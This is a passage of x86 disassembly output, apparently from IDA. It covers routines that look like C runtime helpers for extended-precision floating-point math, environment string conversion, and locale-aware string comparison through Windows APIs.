jmp loc_4395A9
; ---------------------------------------------------------------------------
loc_439264: ; CODE XREF: sub_439170+BB�j
mov edx, [ebp+var_30]
and edx, 0FFFFh
cmp edx, 3FBFh
jg short loc_439297
mov eax, [ebp+arg_0]
mov dword ptr [eax+8], 0
mov ecx, [ebp+arg_0]
mov dword ptr [ecx+4], 0
mov edx, [ebp+arg_0]
mov dword ptr [edx], 0
jmp loc_4395A9
; ---------------------------------------------------------------------------
loc_439297: ; CODE XREF: sub_439170+103�j
mov eax, [ebp+var_18]
and eax, 0FFFFh
test eax, eax
jnz short loc_4392DD
mov cx, word ptr [ebp+var_30]
add cx, 1
mov word ptr [ebp+var_30], cx
mov edx, [ebp+arg_0]
mov eax, [edx+8]
and eax, 7FFFFFFFh
test eax, eax
jnz short loc_4392DD
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx+4], 0
jnz short loc_4392DD
mov edx, [ebp+arg_0]
cmp dword ptr [edx], 0
jnz short loc_4392DD
mov eax, [ebp+arg_0]
mov word ptr [eax+0Ah], 0
jmp loc_4395A9
; ---------------------------------------------------------------------------
loc_4392DD: ; CODE XREF: sub_439170+131�j
; sub_439170+14C�j ...
mov ecx, [ebp+var_20]
and ecx, 0FFFFh
test ecx, ecx
jnz short loc_439339
mov dx, word ptr [ebp+var_30]
add dx, 1
mov word ptr [ebp+var_30], dx
mov eax, [ebp+arg_4]
mov ecx, [eax+8]
and ecx, 7FFFFFFFh
test ecx, ecx
jnz short loc_439339
mov edx, [ebp+arg_4]
cmp dword ptr [edx+4], 0
jnz short loc_439339
mov eax, [ebp+arg_4]
cmp dword ptr [eax], 0
jnz short loc_439339
mov ecx, [ebp+arg_0]
mov dword ptr [ecx+8], 0
mov edx, [ebp+arg_0]
mov dword ptr [edx+4], 0
mov eax, [ebp+arg_0]
mov dword ptr [eax], 0
jmp loc_4395A9
; ---------------------------------------------------------------------------
loc_439339: ; CODE XREF: sub_439170+178�j
; sub_439170+194�j ...
mov [ebp+var_28], 0
mov [ebp+var_1C], 0
jmp short loc_439352
; ---------------------------------------------------------------------------
loc_439349: ; CODE XREF: sub_439170+29C�j
mov ecx, [ebp+var_1C]
add ecx, 1
mov [ebp+var_1C], ecx
loc_439352: ; CODE XREF: sub_439170+1D7�j
cmp [ebp+var_1C], 5
jge loc_439411
mov edx, [ebp+var_1C]
shl edx, 1
mov [ebp+var_24], edx
mov [ebp+var_8], 8
mov eax, 5
sub eax, [ebp+var_1C]
mov [ebp+var_34], eax
jmp short loc_439381
; ---------------------------------------------------------------------------
loc_439378: ; CODE XREF: sub_439170+28E�j
mov ecx, [ebp+var_34]
sub ecx, 1
mov [ebp+var_34], ecx
loc_439381: ; CODE XREF: sub_439170+206�j
cmp [ebp+var_34], 0
jle short loc_439403
mov edx, [ebp+arg_0]
add edx, [ebp+var_24]
mov [ebp+var_38], edx
mov eax, [ebp+arg_4]
add eax, [ebp+var_8]
mov [ebp+var_3C], eax
mov ecx, [ebp+var_28]
lea edx, [ebp+ecx+var_14]
mov [ebp+var_40], edx
mov eax, [ebp+var_38]
xor ecx, ecx
mov cx, [eax]
mov edx, [ebp+var_3C]
xor eax, eax
mov ax, [edx]
imul ecx, eax
mov [ebp+var_44], ecx
mov ecx, [ebp+var_40]
push ecx
mov edx, [ebp+var_44]
push edx
mov eax, [ebp+var_40]
mov ecx, [eax]
push ecx
call sub_4360F0
add esp, 0Ch
mov [ebp+var_48], eax
cmp [ebp+var_48], 0
jz short loc_4393EC
mov edx, [ebp+var_28]
mov ax, word ptr [ebp+edx+var_10]
add ax, 1
mov ecx, [ebp+var_28]
mov word ptr [ebp+ecx+var_10], ax
loc_4393EC: ; CODE XREF: sub_439170+266�j
mov edx, [ebp+var_24]
add edx, 2
mov [ebp+var_24], edx
mov eax, [ebp+var_8]
sub eax, 2
mov [ebp+var_8], eax
jmp loc_439378
; ---------------------------------------------------------------------------
loc_439403: ; CODE XREF: sub_439170+215�j
mov ecx, [ebp+var_28]
add ecx, 2
mov [ebp+var_28], ecx
jmp loc_439349
; ---------------------------------------------------------------------------
loc_439411: ; CODE XREF: sub_439170+1E6�j
mov dx, word ptr [ebp+var_30]
sub dx, 3FFEh
mov word ptr [ebp+var_30], dx
loc_43941E: ; CODE XREF: sub_439170+2DB�j
movsx eax, word ptr [ebp+var_30]
test eax, eax
jle short loc_43944D
mov ecx, [ebp+var_C]
and ecx, 80000000h
test ecx, ecx
jnz short loc_43944D
lea edx, [ebp+var_14]
push edx
call sub_4361E0
add esp, 4
mov ax, word ptr [ebp+var_30]
sub ax, 1
mov word ptr [ebp+var_30], ax
jmp short loc_43941E
; ---------------------------------------------------------------------------
loc_43944D: ; CODE XREF: sub_439170+2B4�j
; sub_439170+2C1�j
movsx ecx, word ptr [ebp+var_30]
test ecx, ecx
jg short loc_4394AD
mov dx, word ptr [ebp+var_30]
sub dx, 1
mov word ptr [ebp+var_30], dx
loc_439461: ; CODE XREF: sub_439170+32A�j
movsx eax, word ptr [ebp+var_30]
test eax, eax
jge short loc_43949C
mov ecx, [ebp+var_14]
and ecx, 0FFFFh
and ecx, 1
test ecx, ecx
jz short loc_439482
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
loc_439482: ; CODE XREF: sub_439170+307�j
lea eax, [ebp+var_14]
push eax
call sub_436240
add esp, 4
mov cx, word ptr [ebp+var_30]
add cx, 1
mov word ptr [ebp+var_30], cx
jmp short loc_439461
; ---------------------------------------------------------------------------
loc_43949C: ; CODE XREF: sub_439170+2F7�j
cmp [ebp+var_4], 0
jz short loc_4394AD
mov dx, word ptr [ebp+var_14]
or dl, 1
mov word ptr [ebp+var_14], dx
loc_4394AD: ; CODE XREF: sub_439170+2E3�j
; sub_439170+330�j
mov eax, [ebp+var_14]
and eax, 0FFFFh
cmp eax, 8000h
jg short loc_4394CD
mov ecx, [ebp+var_14]
and ecx, 1FFFFh
cmp ecx, 18000h
jnz short loc_43952E
loc_4394CD: ; CODE XREF: sub_439170+34A�j
cmp [ebp+var_14+2], 0FFFFFFFFh
jnz short loc_439525
mov [ebp+var_14+2], 0
cmp [ebp+var_10+2], 0FFFFFFFFh
jnz short loc_43951A
mov [ebp+var_10+2], 0
mov edx, [ebp+var_C+2]
and edx, 0FFFFh
cmp edx, 0FFFFh
jnz short loc_43950C
mov word ptr [ebp+var_C+2], 8000h
mov ax, word ptr [ebp+var_30]
add ax, 1
mov word ptr [ebp+var_30], ax
jmp short loc_439518
; ---------------------------------------------------------------------------
loc_43950C: ; CODE XREF: sub_439170+386�j
mov cx, word ptr [ebp+var_C+2]
add cx, 1
mov word ptr [ebp+var_C+2], cx
loc_439518: ; CODE XREF: sub_439170+39A�j
jmp short loc_439523
; ---------------------------------------------------------------------------
loc_43951A: ; CODE XREF: sub_439170+36E�j
mov edx, [ebp+var_10+2]
add edx, 1
mov [ebp+var_10+2], edx
loc_439523: ; CODE XREF: sub_439170:loc_439518�j
jmp short loc_43952E
; ---------------------------------------------------------------------------
loc_439525: ; CODE XREF: sub_439170+361�j
mov eax, [ebp+var_14+2]
add eax, 1
mov [ebp+var_14+2], eax
loc_43952E: ; CODE XREF: sub_439170+35B�j
; sub_439170:loc_439523�j
mov ecx, [ebp+var_30]
and ecx, 0FFFFh
cmp ecx, 7FFFh
jl short loc_439573
mov edx, [ebp+var_2C]
and edx, 0FFFFh
neg edx
sbb edx, edx
and edx, 80000000h
add edx, 7FFF8000h
mov eax, [ebp+arg_0]
mov [eax+8], edx
mov ecx, [ebp+arg_0]
mov dword ptr [ecx+4], 0
mov edx, [ebp+arg_0]
mov dword ptr [edx], 0
jmp short loc_4395A9
; ---------------------------------------------------------------------------
loc_439573: ; CODE XREF: sub_439170+3CD�j
mov eax, [ebp+arg_0]
mov cx, word ptr [ebp+var_14+2]
mov [eax], cx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_10]
mov [edx+2], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_C]
mov [ecx+6], edx
mov eax, [ebp+var_30]
and eax, 0FFFFh
mov ecx, [ebp+var_2C]
and ecx, 0FFFFh
or eax, ecx
mov edx, [ebp+arg_0]
mov [edx+0Ah], ax
loc_4395A9: ; CODE XREF: sub_439170+EF�j
; sub_439170+122�j ...
mov esp, ebp
pop ebp
retn
sub_439170 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4395B0 proc near ; CODE XREF: sub_4363F0+914�p
; sub_436F70+288�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, offset dword_454E20
sub eax, 60h
mov [ebp+var_4], eax
cmp [ebp+arg_4], 0
jnz short loc_4395CC
jmp loc_43966F
; ---------------------------------------------------------------------------
loc_4395CC: ; CODE XREF: sub_4395B0+15�j
cmp [ebp+arg_4], 0
jge short loc_4395E5
mov ecx, [ebp+arg_4]
neg ecx
mov [ebp+arg_4], ecx
mov edx, offset dword_454F80
sub edx, 60h
mov [ebp+var_4], edx
loc_4395E5: ; CODE XREF: sub_4395B0+20�j
cmp [ebp+arg_8], 0
jnz short loc_4395F3
mov eax, [ebp+arg_0]
mov word ptr [eax], 0
loc_4395F3: ; CODE XREF: sub_4395B0+39�j
; sub_4395B0+6A�j ...
cmp [ebp+arg_4], 0
jz short loc_43966F
mov ecx, [ebp+var_4]
add ecx, 54h
mov [ebp+var_4], ecx
mov edx, [ebp+arg_4]
and edx, 7
mov [ebp+var_18], edx
mov eax, [ebp+arg_4]
sar eax, 3
mov [ebp+arg_4], eax
cmp [ebp+var_18], 0
jnz short loc_43961C
jmp short loc_4395F3
; ---------------------------------------------------------------------------
loc_43961C: ; CODE XREF: sub_4395B0+68�j
mov ecx, [ebp+var_18]
imul ecx, 0Ch
mov edx, [ebp+var_4]
add edx, ecx
mov [ebp+var_8], edx
mov eax, [ebp+var_8]
xor ecx, ecx
mov cx, [eax]
cmp ecx, 8000h
jl short loc_43965D
mov edx, [ebp+var_8]
mov eax, [edx]
mov [ebp+var_14], eax
mov ecx, [edx+4]
mov [ebp+var_10], ecx
mov edx, [edx+8]
mov [ebp+var_C], edx
mov eax, [ebp+var_14+2]
sub eax, 1
mov [ebp+var_14+2], eax
lea ecx, [ebp+var_14]
mov [ebp+var_8], ecx
loc_43965D: ; CODE XREF: sub_4395B0+88�j
mov edx, [ebp+var_8]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_439170
add esp, 8
jmp short loc_4395F3
; ---------------------------------------------------------------------------
loc_43966F: ; CODE XREF: sub_4395B0+17�j
; sub_4395B0+47�j
mov esp, ebp
pop ebp
retn
sub_4395B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_439680 proc near ; CODE XREF: sub_4374C0+9B�p
; sub_43A200+2D�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_8], 0
jnz short loc_43968E
xor eax, eax
jmp short loc_4396CB
; ---------------------------------------------------------------------------
loc_43968E: ; CODE XREF: sub_439680+8�j
mov eax, ds:dword_4F37CC
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_0]
push ecx
push 1
mov edx, ds:dword_4F39E4
push edx
call sub_439AD0
add esp, 1Ch
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4396C5
mov eax, 7FFFFFFFh
jmp short loc_4396CB
; ---------------------------------------------------------------------------
loc_4396C5: ; CODE XREF: sub_439680+3C�j
mov eax, [ebp+var_4]
sub eax, 2
loc_4396CB: ; CODE XREF: sub_439680+C�j
; sub_439680+43�j
mov esp, ebp
pop ebp
retn
sub_439680 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4396D0 proc near ; CODE XREF: sub_4374C0+2D�p
; sub_439F20+81�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, ds:dword_4F331C
mov [ebp+var_4], eax
loc_4396DE: ; CODE XREF: sub_4396D0+A3�j
mov ecx, [ebp+var_4]
cmp dword ptr [ecx], 0
jz loc_439778
push 0
push 0
push 0
push 0
push 0FFFFFFFFh
mov edx, [ebp+var_4]
mov eax, [edx]
push eax
push 0
push 1
call ds:dword_4F5450 ; WideCharToMultiByte
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_439712
or eax, 0FFFFFFFFh
jmp short loc_43977A
; ---------------------------------------------------------------------------
loc_439712: ; CODE XREF: sub_4396D0+3B�j
push 3Dh
push offset dword_43E060
push 2
mov ecx, [ebp+var_C]
push ecx
call sub_41BE70
add esp, 10h
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_439735
or eax, 0FFFFFFFFh
jmp short loc_43977A
; ---------------------------------------------------------------------------
loc_439735: ; CODE XREF: sub_4396D0+5E�j
push 0
push 0
mov edx, [ebp+var_C]
push edx
mov eax, [ebp+var_8]
push eax
push 0FFFFFFFFh
mov ecx, [ebp+var_4]
mov edx, [ecx]
push edx
push 0
push 1
call ds:dword_4F5450 ; WideCharToMultiByte
test eax, eax
jnz short loc_43975C
or eax, 0FFFFFFFFh
jmp short loc_43977A
; ---------------------------------------------------------------------------
loc_43975C: ; CODE XREF: sub_4396D0+85�j
push 0
mov eax, [ebp+var_8]
push eax
call sub_439F20
add esp, 8
mov ecx, [ebp+var_4]
add ecx, 4
mov [ebp+var_4], ecx
jmp loc_4396DE
; ---------------------------------------------------------------------------
loc_439778: ; CODE XREF: sub_4396D0+14�j
xor eax, eax
loc_43977A: ; CODE XREF: sub_4396D0+40�j
; sub_4396D0+63�j ...
mov esp, ebp
pop ebp
retn
sub_4396D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_439780 proc near ; CODE XREF: sub_438A00+19C�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_43E070
push offset sub_423364
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFE8h
push ebx
push esi
push edi
mov [ebp+var_18], esp
cmp ds:dword_4F368C, 0
jnz short loc_4397F2
push 0
push 0
push 1
push 0
call ds:dword_4F52E4 ; GetLocaleInfoW
test eax, eax
jz short loc_4397CD
mov ds:dword_4F368C, 1
jmp short loc_4397F2
; ---------------------------------------------------------------------------
loc_4397CD: ; CODE XREF: sub_439780+3F�j
push 0
push 0
push 1
push 0
call ds:dword_4F5398 ; GetLocaleInfoA
test eax, eax
jz short loc_4397EB
mov ds:dword_4F368C, 2
jmp short loc_4397F2
; ---------------------------------------------------------------------------
loc_4397EB: ; CODE XREF: sub_439780+5D�j
xor eax, eax
jmp loc_439901
; ---------------------------------------------------------------------------
loc_4397F2: ; CODE XREF: sub_439780+2D�j
; sub_439780+4B�j ...
cmp ds:dword_4F368C, 1
jnz short loc_439816
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call ds:dword_4F52E4 ; GetLocaleInfoW
jmp loc_439901
; ---------------------------------------------------------------------------
loc_439816: ; CODE XREF: sub_439780+79�j
cmp ds:dword_4F368C, 2
jnz loc_4398FF
cmp [ebp+arg_10], 0
jnz short loc_439832
mov ecx, ds:dword_4F3408
mov [ebp+arg_10], ecx
loc_439832: ; CODE XREF: sub_439780+A7�j
push 0
push 0
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call ds:dword_4F5398 ; GetLocaleInfoA
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jnz short loc_439854
xor eax, eax
jmp loc_439901
; ---------------------------------------------------------------------------
loc_439854: ; CODE XREF: sub_439780+CB�j
mov [ebp+var_4], 0
mov eax, [ebp+var_1C]
add eax, 3
and al, 0FCh
call sub_41EF80
mov [ebp+var_28], esp
mov [ebp+var_18], esp
mov ecx, [ebp+var_28]
mov [ebp+var_20], ecx
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_439894
; ---------------------------------------------------------------------------
mov eax, 1
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
mov [ebp+var_20], 0
mov [ebp+var_4], 0FFFFFFFFh
loc_439894: ; CODE XREF: sub_439780+FB�j
cmp [ebp+var_20], 0
jnz short loc_43989E
xor eax, eax
jmp short loc_439901
; ---------------------------------------------------------------------------
loc_43989E: ; CODE XREF: sub_439780+118�j
mov edx, [ebp+var_1C]
push edx
mov eax, [ebp+var_20]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call ds:dword_4F5398 ; GetLocaleInfoA
test eax, eax
jnz short loc_4398BC
xor eax, eax
jmp short loc_439901
; ---------------------------------------------------------------------------
loc_4398BC: ; CODE XREF: sub_439780+136�j
cmp [ebp+arg_C], 0
jnz short loc_4398DD
push 0
push 0
push 0FFFFFFFFh
mov eax, [ebp+var_20]
push eax
push 1
mov ecx, [ebp+arg_10]
push ecx
call ds:dword_4F5454 ; MultiByteToWideChar
mov [ebp+var_24], eax
jmp short loc_4398FA
; ---------------------------------------------------------------------------
loc_4398DD: ; CODE XREF: sub_439780+140�j
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_8]
push eax
push 0FFFFFFFFh
mov ecx, [ebp+var_20]
push ecx
push 1
mov edx, [ebp+arg_10]
push edx
call ds:dword_4F5454 ; MultiByteToWideChar
mov [ebp+var_24], eax
loc_4398FA: ; CODE XREF: sub_439780+15B�j
mov eax, [ebp+var_24]
jmp short loc_439901
; ---------------------------------------------------------------------------
loc_4398FF: ; CODE XREF: sub_439780+9D�j
xor eax, eax
loc_439901: ; CODE XREF: sub_439780+6D�j
; sub_439780+91�j ...
lea esp, [ebp-34h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_439780 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_439920 proc near ; CODE XREF: sub_438A00+4B�p
; sub_438A00+7E�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_43E080
push offset sub_423364
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFE8h
push ebx
push esi
push edi
mov [ebp+var_18], esp
cmp ds:dword_4F3690, 0
jnz short loc_439992
push 0
push 0
push 1
push 0
call ds:dword_4F52E4 ; GetLocaleInfoW
test eax, eax
jz short loc_43996D
mov ds:dword_4F3690, 1
jmp short loc_439992
; ---------------------------------------------------------------------------
loc_43996D: ; CODE XREF: sub_439920+3F�j
push 0
push 0
push 1
push 0
call ds:dword_4F5398 ; GetLocaleInfoA
test eax, eax
jz short loc_43998B
mov ds:dword_4F3690, 2
jmp short loc_439992
; ---------------------------------------------------------------------------
loc_43998B: ; CODE XREF: sub_439920+5D�j
xor eax, eax
jmp loc_439AB1
; ---------------------------------------------------------------------------
loc_439992: ; CODE XREF: sub_439920+2D�j
; sub_439920+4B�j ...
cmp ds:dword_4F3690, 2
jnz short loc_4399B6
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call ds:dword_4F5398 ; GetLocaleInfoA
jmp loc_439AB1
; ---------------------------------------------------------------------------
loc_4399B6: ; CODE XREF: sub_439920+79�j
cmp ds:dword_4F3690, 1
jnz loc_439AAF
cmp [ebp+arg_10], 0
jnz short loc_4399D2
mov ecx, ds:dword_4F3408
mov [ebp+arg_10], ecx
loc_4399D2: ; CODE XREF: sub_439920+A7�j
push 0
push 0
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call ds:dword_4F52E4 ; GetLocaleInfoW
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jnz short loc_4399F4
xor eax, eax
jmp loc_439AB1
; ---------------------------------------------------------------------------
loc_4399F4: ; CODE XREF: sub_439920+CB�j
mov [ebp+var_4], 0
mov eax, [ebp+var_1C]
shl eax, 1
add eax, 3
and al, 0FCh
call sub_41EF80
mov [ebp+var_28], esp
mov [ebp+var_18], esp
mov ecx, [ebp+var_28]
mov [ebp+var_20], ecx
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_439A36
; ---------------------------------------------------------------------------
mov eax, 1
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
mov [ebp+var_20], 0
mov [ebp+var_4], 0FFFFFFFFh
loc_439A36: ; CODE XREF: sub_439920+FD�j
cmp [ebp+var_20], 0
jnz short loc_439A40
xor eax, eax
jmp short loc_439AB1
; ---------------------------------------------------------------------------
loc_439A40: ; CODE XREF: sub_439920+11A�j
mov edx, [ebp+var_1C]
push edx
mov eax, [ebp+var_20]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call ds:dword_4F52E4 ; GetLocaleInfoW
test eax, eax
jnz short loc_439A5E
xor eax, eax
jmp short loc_439AB1
; ---------------------------------------------------------------------------
loc_439A5E: ; CODE XREF: sub_439920+138�j
cmp [ebp+arg_C], 0
jnz short loc_439A86
push 0
push 0
push 0
push 0
push 0FFFFFFFFh
mov eax, [ebp+var_20]
push eax
push 220h
mov ecx, [ebp+arg_10]
push ecx
call ds:dword_4F5450 ; WideCharToMultiByte
mov [ebp+var_24], eax
jmp short loc_439AAA
; ---------------------------------------------------------------------------
loc_439A86: ; CODE XREF: sub_439920+142�j
push 0
push 0
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_8]
push eax
push 0FFFFFFFFh
mov ecx, [ebp+var_20]
push ecx
push 220h
mov edx, [ebp+arg_10]
push edx
call ds:dword_4F5450 ; WideCharToMultiByte
mov [ebp+var_24], eax
loc_439AAA: ; CODE XREF: sub_439920+164�j
mov eax, [ebp+var_24]
jmp short loc_439AB1
; ---------------------------------------------------------------------------
loc_439AAF: ; CODE XREF: sub_439920+9D�j
xor eax, eax
loc_439AB1: ; CODE XREF: sub_439920+6D�j
; sub_439920+91�j ...
lea esp, [ebp-34h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_439920 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_439AD0 proc near ; CODE XREF: sub_439680+2D�p
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_36 = byte ptr -36h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_43E0D8
push offset sub_423364
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFC8h
push ebx
push esi
push edi
mov [ebp+var_18], esp
cmp ds:dword_4F3694, 0
jnz short loc_439B56
push 1
push offset dword_43D410
push 1
push offset dword_43D410
push 0
push 0
call ds:dword_4F52DC ; CompareStringW
test eax, eax
jz short loc_439B27
mov ds:dword_4F3694, 1
jmp short loc_439B56
; ---------------------------------------------------------------------------
loc_439B27: ; CODE XREF: sub_439AD0+49�j
push 1
push offset dword_43D40C
push 1
push offset dword_43D40C
push 0
push 0
call ds:dword_4F52E0 ; CompareStringA
test eax, eax
jz short loc_439B4F
mov ds:dword_4F3694, 2
jmp short loc_439B56
; ---------------------------------------------------------------------------
loc_439B4F: ; CODE XREF: sub_439AD0+71�j
xor eax, eax
jmp loc_439EB4
; ---------------------------------------------------------------------------
loc_439B56: ; CODE XREF: sub_439AD0+2D�j
; sub_439AD0+55�j ...
cmp [ebp+arg_C], 0
jle short loc_439B6F
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
call sub_439ED0
add esp, 8
mov [ebp+arg_C], eax
loc_439B6F: ; CODE XREF: sub_439AD0+8A�j
cmp [ebp+arg_14], 0
jle short loc_439B88
mov edx, [ebp+arg_14]
push edx
mov eax, [ebp+arg_10]
push eax
call sub_439ED0
add esp, 8
mov [ebp+arg_14], eax
loc_439B88: ; CODE XREF: sub_439AD0+A3�j
cmp ds:dword_4F3694, 2
jnz short loc_439BB4
mov ecx, [ebp+arg_14]
push ecx
mov edx, [ebp+arg_10]
push edx
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call ds:dword_4F52E0 ; CompareStringA
jmp loc_439EB4
; ---------------------------------------------------------------------------
loc_439BB4: ; CODE XREF: sub_439AD0+BF�j
cmp ds:dword_4F3694, 1
jnz loc_439EB2
cmp [ebp+arg_18], 0
jnz short loc_439BD0
mov ecx, ds:dword_4F3408
mov [ebp+arg_18], ecx
loc_439BD0: ; CODE XREF: sub_439AD0+F5�j
cmp [ebp+arg_C], 0
jz short loc_439BE0
cmp [ebp+arg_14], 0
jnz loc_439D5C
loc_439BE0: ; CODE XREF: sub_439AD0+104�j
mov edx, [ebp+arg_C]
cmp edx, [ebp+arg_14]
jnz short loc_439BF2
mov eax, 2
jmp loc_439EB4
; ---------------------------------------------------------------------------
loc_439BF2: ; CODE XREF: sub_439AD0+116�j
cmp [ebp+arg_14], 1
jle short loc_439C02
mov eax, 1
jmp loc_439EB4
; ---------------------------------------------------------------------------
loc_439C02: ; CODE XREF: sub_439AD0+126�j
cmp [ebp+arg_C], 1
jle short loc_439C12
mov eax, 3
jmp loc_439EB4
; ---------------------------------------------------------------------------
loc_439C12: ; CODE XREF: sub_439AD0+136�j
lea eax, [ebp+var_3C]
push eax
mov ecx, [ebp+arg_18]
push ecx
call ds:dword_4F54E0 ; GetCPInfo
test eax, eax
jnz short loc_439C2B
xor eax, eax
jmp loc_439EB4
; ---------------------------------------------------------------------------
loc_439C2B: ; CODE XREF: sub_439AD0+152�j
; sub_439AD0+198�j
cmp [ebp+arg_C], 0
jnz short loc_439C37
cmp [ebp+arg_14], 1
jz short loc_439C64
loc_439C37: ; CODE XREF: sub_439AD0+15F�j
cmp [ebp+arg_C], 1
jnz short loc_439C43
cmp [ebp+arg_14], 0
jz short loc_439C64
loc_439C43: ; CODE XREF: sub_439AD0+16B�j
push offset aCchcount10Cchc ; "cchCount1==0 && cchCount2==1 || cchCoun"...
push 0
push 0B6h
push offset dword_43E08C
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_439C64
int 3 ; Trap to Debugger
loc_439C64: ; CODE XREF: sub_439AD0+165�j
; sub_439AD0+171�j ...
xor edx, edx
test edx, edx
jnz short loc_439C2B
cmp [ebp+arg_C], 0
jle short loc_439CE3
cmp [ebp+var_3C], 2
jnb short loc_439C80
mov eax, 3
jmp loc_439EB4
; ---------------------------------------------------------------------------
loc_439C80: ; CODE XREF: sub_439AD0+1A4�j
lea eax, [ebp+var_36]
mov [ebp+var_40], eax
jmp short loc_439C91
; ---------------------------------------------------------------------------
loc_439C88: ; CODE XREF: sub_439AD0:loc_439CD7�j
mov ecx, [ebp+var_40]
add ecx, 2
mov [ebp+var_40], ecx
loc_439C91: ; CODE XREF: sub_439AD0+1B6�j
mov edx, [ebp+var_40]
xor eax, eax
mov al, [edx]
test eax, eax
jz short loc_439CD9
mov ecx, [ebp+var_40]
xor edx, edx
mov dl, [ecx+1]
test edx, edx
jz short loc_439CD9
mov eax, [ebp+arg_8]
xor ecx, ecx
mov cl, [eax]
mov edx, [ebp+var_40]
xor eax, eax
mov al, [edx]
cmp ecx, eax
jl short loc_439CD7
mov ecx, [ebp+arg_8]
xor edx, edx
mov dl, [ecx]
mov eax, [ebp+var_40]
xor ecx, ecx
mov cl, [eax+1]
cmp edx, ecx
jg short loc_439CD7
mov eax, 2
jmp loc_439EB4
; ---------------------------------------------------------------------------
loc_439CD7: ; CODE XREF: sub_439AD0+1E8�j
; sub_439AD0+1FB�j
jmp short loc_439C88
; ---------------------------------------------------------------------------
loc_439CD9: ; CODE XREF: sub_439AD0+1CA�j
; sub_439AD0+1D6�j
mov eax, 3
jmp loc_439EB4
; ---------------------------------------------------------------------------
loc_439CE3: ; CODE XREF: sub_439AD0+19E�j
cmp [ebp+arg_14], 0
